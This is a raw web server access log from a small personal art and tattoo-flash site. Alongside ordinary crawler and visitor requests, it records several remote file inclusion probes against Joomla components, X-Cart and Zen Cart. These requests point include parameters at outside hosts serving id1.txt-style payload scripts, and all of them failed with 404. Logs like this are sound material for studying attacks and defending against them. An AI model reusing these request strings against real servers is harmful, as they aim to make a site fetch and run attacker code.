81.21.68.20 - - [19/Apr/2010:21:48:27 -0500] "GET /logs/access_log.1219363200//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://200.21.184.243/appserv/id1.gif???? HTTP/1.1" 404 355 "-""Mozilla/5.0"
87.250.255.243 - - [19/Apr/2010:21:49:39 -0500] "GET /logs/access_log.1247270400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [19/Apr/2010:21:55:03 -0500] "GET /logs/access_log.1209254400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [19/Apr/2010:21:55:37 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [19/Apr/2010:21:55:37 -0500] "GET /costume/thmb9.htm HTTP/1.0" 200 2227 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [19/Apr/2010:21:55:47 -0500] "GET /logs/access_log.1224633600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [19/Apr/2010:21:59:34 -0500] "GET /logs/access_log.1253750400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
64.12.116.16 - - [19/Apr/2010:22:00:48 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/search?hl=en&source=hp&ie=ISO-8859-1&q=vintage+tattoo+flash&btnG=Google+Search""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.5009; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 1.1.4322)"
64.12.117.72 - - [19/Apr/2010:22:00:48 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.5009; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 1.1.4322)"
87.250.255.243 - - [19/Apr/2010:22:04:04 -0500] "GET /logs/access_log.1247529600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
66.249.71.225 - - [19/Apr/2010:22:04:48 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
71.156.47.108 - - [19/Apr/2010:22:04:57 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
71.156.47.108 - - [19/Apr/2010:22:04:57 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
71.156.47.108 - - [19/Apr/2010:22:04:57 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
71.156.47.108 - - [19/Apr/2010:22:04:57 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
71.156.47.108 - - [19/Apr/2010:22:04:57 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
71.156.47.108 - - [19/Apr/2010:22:04:57 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
71.156.47.108 - - [19/Apr/2010:22:04:57 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
71.156.47.108 - - [19/Apr/2010:22:04:57 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
71.156.47.108 - - [19/Apr/2010:22:04:57 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
71.156.47.108 - - [19/Apr/2010:22:04:57 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
71.156.47.108 - - [19/Apr/2010:22:04:57 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
67.195.112.180 - - [19/Apr/2010:22:06:27 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.216.43.133 - - [19/Apr/2010:22:07:41 -0500] "GET /logs/access_log.1264464000/index.php?menu=deti&page=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:22:07:41 -0500] "GET /logs/access_log.1251504000/index.php?menu=deti&page=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:22:07:41 -0500] "GET /logs/index.php?menu=deti&page=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:22:07:41 -0500] "GET /index.php?menu=deti&page=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:22:08:03 -0500] "GET /logs/index.php?menu=deti&page=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:22:08:03 -0500] "GET /logs/access_log.1251504000/index.php?menu=deti&page=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:22:08:03 -0500] "GET /index.php?menu=deti&page=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:22:08:03 -0500] "GET /logs/access_log.1264464000/index.php?menu=deti&page=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:22:08:05 -0500] "GET /index.php?menu=deti&page=http://kumcalb.org///g4/adm/img/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:22:08:05 -0500] "GET /logs/index.php?menu=deti&page=http://kumcalb.org///g4/adm/img/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:22:08:05 -0500] "GET /logs/access_log.1251504000/index.php?menu=deti&page=http://kumcalb.org///g4/adm/img/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:22:08:05 -0500] "GET /logs/access_log.1264464000/index.php?menu=deti&page=http://kumcalb.org///g4/adm/img/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:22:08:10 -0500] "GET /logs/index.php?menu=deti&page=http://kumcalb.org///g4/adm/img/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:22:08:10 -0500] "GET /logs/access_log.1251504000/index.php?menu=deti&page=http://kumcalb.org///g4/adm/img/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:22:08:10 -0500] "GET /index.php?menu=deti&page=http://kumcalb.org///g4/adm/img/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:22:08:10 -0500] "GET /logs/access_log.1264464000/index.php?menu=deti&page=http://kumcalb.org///g4/adm/img/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
72.30.161.241 - - [19/Apr/2010:22:08:42 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.161.241 - - [19/Apr/2010:22:08:42 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
64.113.184.23 - - [19/Apr/2010:22:10:59 -0500] "GET /logs/access_log.1263859200//admin/auth.php?xcart_dir=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:22:10:59 -0500] "GET //admin/auth.php?xcart_dir=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:22:10:59 -0500] "GET /logs//admin/auth.php?xcart_dir=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 304 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:22:11:00 -0500] "GET /logs//admin/auth.php?xcart_dir=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 304 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:22:11:00 -0500] "GET //admin/auth.php?xcart_dir=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:22:11:00 -0500] "GET /logs/access_log.1263859200//admin/auth.php?xcart_dir=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.250.255.243 - - [19/Apr/2010:22:11:17 -0500] "GET /logs/access_log.1168387200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
64.113.184.23 - - [19/Apr/2010:22:11:25 -0500] "GET /logs/access_log.1264464000//admin/auth.php?xcart_dir=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:22:11:25 -0500] "GET /logs/access_log.1263859200//admin/auth.php?xcart_dir=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:22:11:25 -0500] "GET //admin/auth.php?xcart_dir=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:22:11:25 -0500] "GET /logs//admin/auth.php?xcart_dir=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 304 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:22:11:25 -0500] "GET //admin/auth.php?xcart_dir=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:22:11:25 -0500] "GET /logs//admin/auth.php?xcart_dir=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 304 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:22:11:25 -0500] "GET /logs/access_log.1263859200//admin/auth.php?xcart_dir=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:22:11:25 -0500] "GET /logs/access_log.1264464000//admin/auth.php?xcart_dir=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
121.190.102.21 - - [19/Apr/2010:22:14:17 -0500] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
121.190.102.21 - - [19/Apr/2010:22:14:17 -0500] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
121.190.102.21 - - [19/Apr/2010:22:14:18 -0500] "GET /logs/access_log.1268956800%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt???? HTTP/1.1" 404 367 "-""Mozilla/5.0"
121.190.102.21 - - [19/Apr/2010:22:14:24 -0500] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
121.190.102.21 - - [19/Apr/2010:22:14:24 -0500] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
121.190.102.21 - - [19/Apr/2010:22:14:24 -0500] "GET /logs/access_log.1268956800%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 367 "-""Mozilla/5.0"
87.250.255.243 - - [19/Apr/2010:22:18:29 -0500] "GET /logs/access_log.1184976000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [19/Apr/2010:22:23:54 -0500] "GET /logs/access_log.1232236800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [19/Apr/2010:22:29:18 -0500] "GET /logs/access_log.1219968000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
88.191.94.188 - - [19/Apr/2010:22:31:06 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
88.191.94.188 - - [19/Apr/2010:22:31:06 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
88.191.94.188 - - [19/Apr/2010:22:31:06 -0500] "GET /logs/access_log.1263859200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
87.250.255.243 - - [19/Apr/2010:22:33:39 -0500] "GET /logs/access_log.1252368000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [19/Apr/2010:22:40:53 -0500] "GET /logs/access_log.1258329600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [19/Apr/2010:22:41:53 -0500] "GET /logs/access_log.1271289600 HTTP/1.1" 200 669492 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.222.152.66 - - [19/Apr/2010:22:42:25 -0500] "GET /logs/access_log.1270598400%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.222.152.66 - - [19/Apr/2010:22:42:25 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
67.222.152.66 - - [19/Apr/2010:22:42:25 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
67.222.152.66 - - [19/Apr/2010:22:42:43 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
67.222.152.66 - - [19/Apr/2010:22:42:43 -0500] "GET /logs/access_log.1270598400%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.222.152.66 - - [19/Apr/2010:22:42:43 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
94.75.229.132 - - [19/Apr/2010:22:42:58 -0500] "GET / HTTP/1.1" 200 1003 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:42:58 -0500] "GET /?N=D HTTP/1.1" 200 1003 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:42:58 -0500] "GET /?M=A HTTP/1.1" 200 1003 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:42:58 -0500] "GET /?S=A HTTP/1.1" 200 1003 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:42:58 -0500] "GET /?D=A HTTP/1.1" 200 1003 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:42:59 -0500] "GET /artwork/ HTTP/1.1" 200 11078 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:42:59 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:42:59 -0500] "GET /logs/ HTTP/1.1" 200 2456 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:00 -0500] "GET /tattoo/ HTTP/1.1" 200 466 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:00 -0500] "GET /?N=A HTTP/1.1" 200 1003 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:00 -0500] "GET /?M=D HTTP/1.1" 200 1003 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:01 -0500] "GET /?S=D HTTP/1.1" 200 1003 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:01 -0500] "GET /?D=D HTTP/1.1" 200 1003 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:01 -0500] "GET /artwork/sculptures.htm HTTP/1.1" 200 3706 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:01 -0500] "GET /artwork/toys.htm HTTP/1.1" 200 1337 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:02 -0500] "GET /artwork/carousel.htm HTTP/1.1" 200 814 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:02 -0500] "GET /artwork/postcards.htm HTTP/1.1" 200 690 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:02 -0500] "GET /artwork/llpostcards.htm HTTP/1.1" 200 1147 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:02 -0500] "GET /artwork/paintings.htm HTTP/1.1" 200 2300 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:03 -0500] "GET /artwork/whirligigs.htm HTTP/1.1" 200 985 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:03 -0500] "GET /artwork/dioramas.htm HTTP/1.1" 200 1230 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:03 -0500] "GET /artwork/playhouse.htm HTTP/1.1" 200 521 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:04 -0500] "GET /artwork/banners.htm HTTP/1.1" 200 3537 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:04 -0500] "GET /artwork/mobiles.htm HTTP/1.1" 200 986 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:05 -0500] "GET /artwork/index.htm HTTP/1.1" 200 11078 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:05 -0500] "GET /artwork/menorahs.htm HTTP/1.1" 200 1007 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:05 -0500] "GET /artwork/hospitals.htm HTTP/1.1" 200 3315 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:06 -0500] "GET /artwork/mirrors.htm HTTP/1.1" 200 1118 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:06 -0500] "GET /artwork/artmaster.htm HTTP/1.1" 200 886 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:06 -0500] "GET /logs/?S=A HTTP/1.1" 200 2456 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:07 -0500] "GET /artwork/miscellaneous.htm HTTP/1.1" 404 309 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:07 -0500] "GET /artwork/txt.htm HTTP/1.1" 200 3880 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:07 -0500] "GET /artwork/furniture.htm HTTP/1.1" 200 1004 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:07 -0500] "GET /artwork/music.htm HTTP/1.1" 200 577 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:08 -0500] "GET /logs/?D=A HTTP/1.1" 200 2456 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:08 -0500] "GET /logs/?S=D HTTP/1.1" 200 2456 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:08 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:08 -0500] "GET /artwork/furniture-motto-line.htm HTTP/1.1" 200 2441 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:09 -0500] "GET /artwork/jewelrybox.htm HTTP/1.1" 200 827 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:09 -0500] "GET /artwork/tombio.htm HTTP/1.1" 404 302 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:09 -0500] "GET /artwork/puzzles.htm HTTP/1.1" 200 1591 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:10 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:10 -0500] "GET /logs/?N=D HTTP/1.1" 200 2456 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:10 -0500] "GET /artwork/dressers.htm HTTP/1.1" 200 1093 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:11 -0500] "GET /artwork/coffins.htm HTTP/1.1" 200 1485 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:11 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:11 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:11 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:12 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:12 -0500] "GET /costume/thmb5.htm HTTP/1.1" 200 3414 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:13 -0500] "GET /tattoo/links.htm HTTP/1.1" 200 1325 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:13 -0500] "GET /logs/?M=A HTTP/1.1" 200 2456 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:13 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21829 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:13 -0500] "GET /costume/thmb9.htm HTTP/1.1" 200 2227 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:14 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:14 -0500] "GET /logs/?M=D HTTP/1.1" 200 2456 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:15 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3957 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
